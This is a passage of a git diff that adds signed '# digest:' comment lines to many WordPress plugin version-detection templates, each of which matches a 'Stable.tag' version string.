4a0a00473045022011ee966c85cbe2ce759599732d28ad86df5bae67b2131a7833aa20ceb27233570221008ddfa125e5af2253fbdc1a523e2f0e0cb52e27ce55f9c077fc7cbb40e3231e62:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 033cc4bc3d..df1d1f7b46 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100837581dc3a37f7ed760a1903128dc33757c768d84a527acc82fe9468c5ab2de5022100d2ebc0f9ffdf3dc1d82c3b33d36908013f492a561e7cd7d5624102b69f9e3413:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluent-smtp.yaml b/http/technologies/wordpress/plugins/fluent-smtp.yaml index 4a3dcbd210..b5e34595ae 100644 --- a/http/technologies/wordpress/plugins/fluent-smtp.yaml +++ b/http/technologies/wordpress/plugins/fluent-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022001e1d84d01e7e229a6626c9ebc59026e36f92ca09ba0ce5664cea04fb0de3854022100a1dafb878263386e3846dbafac0d61449e24dcbfc3f238c47031abfe2601b79d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 945ab6ad03..fa95a3e594 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204ca2448fddb39bf97bcf1a12953f8e842e732926912a208565145ea97f526cfc02205fc3374614ee22eb69ab95e5f2d86a00bfce2ae2a608a05c8a9da7777ec96ba5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 2072b51ab9..6027fa8f51 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022070fdc7bda5ef5f00d0d63d3adf6f75c5ad4e2db10061af01a67ce76d93fe21f202206f3bdc891da3526b04a0dcb15b25c1554a30551e1fb399312c64de29e0c785ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index b509d8cc67..6a702c7e80 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100db5360f5ed8ce8134242cc716696d413555ccf4cef8f90a7e97f5924d60d4c8c0221009a8003aaa2e063073856445740a96f66e77ba5ab4d2814d4f80d93d780450f40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index c984479bde..b899d2e02e 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100876b33965933b17486a2deac195b16a077df691dcb84b8b64b55147e2cbb5c8d02202f0dfc077614fd83a6642875dabeab1eeecfcef2f597a0cfa76b6c236c036472:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index a3870175c7..6e7424bbac 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ec4aece1dbb41a25f3e6f50cc93a6233eccec3dbf2f26bc7a716084113b44fbd022100c6ec491e49a8009249fef67609cb76f56203ddd8f3c649f5e475ad49ed49f53e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index f5f3818ea2..d5c83fd900 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ea913e467b762f85e1106babb335e1ab06ab55f497bc44c3334babf6cc591c14022100c8f510e6b97301fd9ca3f965fbe57bd73d38185fa05d3e888a7f96a4770325bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 7e5b54c12c..e9b24442d6 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a545d3072e7e6f179f9b8c0cbd21e81cba86acaaec5773245ed2e0ee5c2bf75302207dd1dd2d4004b60bf36db7005726f25c539897dca31a4b6a717bf42efff00614:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 59effd09f6..1ffc085247 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008e64681b525d896c9fe6d69852b1ea1599fca1dae3cced69488abecb44c9797d022100a7bcc251d1f1b79d85f45e0ea3fb8f2ceeaf2d2c5649a82a81f5f64276ef78df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 833207dcff..9bfc6be4e6 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b380113ba0fbe78b6351143d75a173b0598d66ad06170aeceefa63d9bc51be7302210097965a4be1d7c86084cc94eeec7d2387b2b6b22c8a170b9516eb7bf8ecd08e93:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index b7ea2d38d1..0f32c064ec 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f892a000ca11a7b81538c7efa19586e2e603822638af74b609fea0cb973b1bb9022100b0fe4efe1e23ea5e54a4b887b765490d2ea95b0540d19a87bf4ec53da6a12b6d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 2131dbe751..7f229ffd09 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220344adf4720d0614d9f46e5870fbd5d50ac6847be431a97a03c0305532d09ede7022100e29c0bb53b6944da60a93836d0f34a024354ba42e41c2c2056ee0e7612ed4ef6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 73d644c5e4..007315de90 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206e0bdcbe970bb8215319c81551e6e52f697cc2ca7080feadb03272e97ce0028b0220412dbf6cd84d42b07a9a0b4867fc51d32cb23e43d61efbbdf568a804d3ea6c83:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 7b0593dcb7..6e747c3fea 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205c40baf409f0f1c276b6f4115a9bc282c72196c95319c903ad0576d18377bc01022100b18eab41e8d9b72f9d363133d236137994d3964a194030974cac83df4555a08f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 6f65d087e4..d8c9ad322d 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e6973dcd64220121888192d431871f10554586f6f1b54afb24cf7c3fd9f4e2240221008119ab4923aac426cdddd53751088327815e85a1adcafae46a59b54c22361ccb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 783cdd283d..d2832ce485 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206cc101b572888023520fff3a72b2b6901f01020ea7a569fda3ecc8044395a8b7022100b25acf240c90d37d05bc3f06fc0245c7f8274d7349443909487b68bc773bc8cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index 05121854b3..62bc66365d 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022052e59fec33b3a88328a910980d0c98a43cc9d152a96cda146324f3390da44669022100b4087868d9228de81bcbdc006294c57faaad44296cd169bf1b056aa32b691631:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 72f52edcd4..e8bc74cad0 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203ad51a4a152083a14e7a505348c90b23d5da746b63f25b9ebc7bd45da071717d022100c3ddd0642f52c80f77961a165e653f3305b79c0b864181a73f37b6c02117d5c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 4cf45ebd74..2613a59f42 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220489170f01df05330c41ca72d1bf56f54832f682af1c44c9ff524f388375b42ab022100b2a4c77397ac9edda329f83038ddd917cba4fd5147e0dc1fe00528533008ce5a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 3d6863e074..b1ef1931c1 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100bbab61c93f44fc5143db252bfd59528d9ed798eb27d63e297280d70b66acd586022012578ab0ecd4c3e265ab6a7fafa2a60db604065c8058c49887c1b9bc032eb6e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 79e2813c5e..0ded8304a2 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f719dda0da3e33ec5c491dc09bbabc528afdd966d24f8e1058f1c0ecd8f3db50022045397913cd7ecf07f1a54d02ac07e77ad0b2207ccfaf79f2884f2914a2faf989:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index ab9a0f1ae3..8bdb78d290 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d5b0c06606b951164fe78184031cc69c3a16b044875fcdb99195e78f058db1b002207085cdb22a86867fbb4ad42d3ac4375a8bfc9fa3d9bdb488ea1c22786daa6b49:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index 5d3adf7c27..e47ab00611 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022039b47a11518e6882ccb9171a0b204fd1f6aa067be0a483564d0f8af092e8732502202fa961666d1486c8b6330525347e7ce697cc44c59d6bdb060976345ac7097c67:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index eda1d27f04..4bd1f0ff20 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022010e0124b97e700b3edb895a587df747e4bb9c39c26b1e5fa9410df7e5fdeddc60221009f24d674544eccb028d57f58be74adc9d57ab086bd59b7bb3a2d20bfc0008ebe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 16dfc8df5f..90edb6f6e4 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c13f935db49042cd1f1d5a8e1411b269a8beb77480cd74be8f703d2586b3f3e80220452154536d09b95825957d3e6557fe580483bec7afea3edcc108eaac6be9baba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 4b7600ea69..776e887ca0 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220539bdebca518f094d3d90d7eccf9642256e88c648d3e90d25214484352ad29ec022100893162c2a2b7fc264bbd9bacf5649beac569ef0a0cb5e74793ffdb9dcbba9eee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 2ccd4dbce8..6d7148f74d 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ad4cf6f9c78850f5d05ee9facdee04977979ce5c185a14528cb0ab62d9dc2a3402205702fcbd7623a511a95a14765745545f54948b38fe8063212fbd21bd5e1de42d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 02ceb224d1..1cebb86420 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022013f22718de938efb4f834631b2f1269515f94d71e8b8d49e8d638464d7f0e671022057501201d4712c5b4496cac12668cb439cda539311931928a62c8878ede68e0a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 367d587ce2..fee22a59ab 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a2f6f046b9be843f1d05b67066b8ab660a66675f4916c56d17b6152bdf38732b0220221804542d9ea58e53db0d3fa5f78f3735023c281b45eceec1edcbe0b083583a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index feed730ee0..38eac717bc 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e371ea8f879db939e010063275bf0e3062a9037132b63d5641468cbfccb38b4702210080d23c19a261a64748c6d6c1d471af550964c43e39491d97f17030c0015cb1a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index 9b2841e7ca..5f2218727c 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d1839589248b334469dfeee8b3109060b0204f73295f26a1b444768a212dcc5d022100a4e05b80baa97779983a42662f4cf67397b68330632fa7f245407a9f1e601806:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 42be14c5df..993edba017 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100831287914ddf33e63131640614e424e5b4ed172e0819601b6928b5627a074c370220183c2fb1b37a1ba6834cb475747a9119f437aa7bd005849f34b0cfa21ab2818d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 4e0cd86c3f..fb1717a51a 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022004157668c6c634111319b62d146ee5f5f26c09b008c90c13d56f6b59e9d5b8bf022100a06d3954270f37316d594ee02d40683656d328e8e85aaad62966684f2604b41d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 59eadc5e6e..ece3968727 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d65d3cadf2a116752bbc432f3cc66dec9f305abd5ed15a5e9383839c21c2470b022028fc7046980d3418db9d406f5a250f5370d1a4ab9c1ba3b508ac711f630ce456:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 41f7a0075e..b93d2a79f9 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207f1196a3192c09e084c38fc7b1f1d643db581fcc32faa3b0a5c4e9db641db51b022100c6935730ff8b7329e3b2da130cdfe68bf314b39348319334721afeba9ffb9afc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 7e35a3fb4f..7414562f63 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c858f45c7a2383ebc8420d602d47aa9a35fe8748eee3af1c44191abaab28ccf6022100d6baa80a061a464afee42aead80156886af1cb359a3f64491be178c0c536c659:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index 18c2a7586e..3f170b92b7 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205624143a915e9d3c85b85283193802ae7d97133a2348c19e284c94c7a916405c02206cf4e2422a85a63fecf64e75f9513816b18d217564c93286437be9877a8d0bd6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 6bc2aa78f9..4a206da20f 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a6d52150d114986ec6ee2eceacc4b66c0c9ed64333606158ca48b351ebb0b1cc022025fc962a4aff0b9f639250472e633f5c6616605843d5981f8da00be7b043f30d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index a43d3352a2..e50285eecb 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220197d8fdc8cb79c4493b32bc01d9395921a5a8bdc531610e28429d14d017997ca02204b1aebda47ef35e4f7ba2999b89f4016ec356b9cf81c7cfae568600581b3092f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index e7db9944e4..76086fb1a0 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201e5380d9edbe2318caa9a8476c8feaba0049c1bcc3debf44fd2407879a880b0a0220240e2ec65ebb18b023a951572e2c6b146ca86525956734472cb844d0e23c8e20:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 268bd7b9df..76bef40f61 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207c6284b5990c7af99b384c9c40fde1243cb5a3341f791e3e2b3dde291d8cf2e302202ff51ddab55f786bcc131cc0cbaf38541a3e00b4742ab680b604ed6fd7239dad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index d7fb2209d1..c43eb5dd1f 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a786df7fdee13c44d18c14e61c7a0660cf5e6c19e6438a88a2a58183c435c6aa022100a305eda4c522d15553fa0429ba832b45c685d31059d781ecf4e12a04e9266f23:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index a1641d4632..a3205fdd6e 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022033a7c8b3b77d26e84e73d79da0b6c188b37d6d4dcfaaf5aa95d8f76008509c4e022100d4e25c6806c77a708c33ee5a11124faf3993c72e0500dd448a8b8aba6edc62f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 3b6542683c..a0258a5472 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203d3ecedc64a1ed41495e67629c022950a33cb8a26f14f5c1d143383ffa61559c022044268e78f465db796353a2f6ce8041628bdf545ed2cf9cee4972e783d812504e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 969c280ee1..c5fc9f59a5 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a1697f0e1615733cb713ecd546d24b3746854b7161f082794db995ddc1ea4a36022100cb50242475451e0bace5695999bc43ab90bcd8ac81fb0e31c7b6982e74b715b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 1c97c422e4..1d5cd6d4b4 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022021bf8383e90ad919339daf6c61019a2802a19846a93b2c40d289a5922949c32f02206214df6d4b5a9a9f088c38dcc701916525ccf0f84c4821a9653d5ada399540e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml 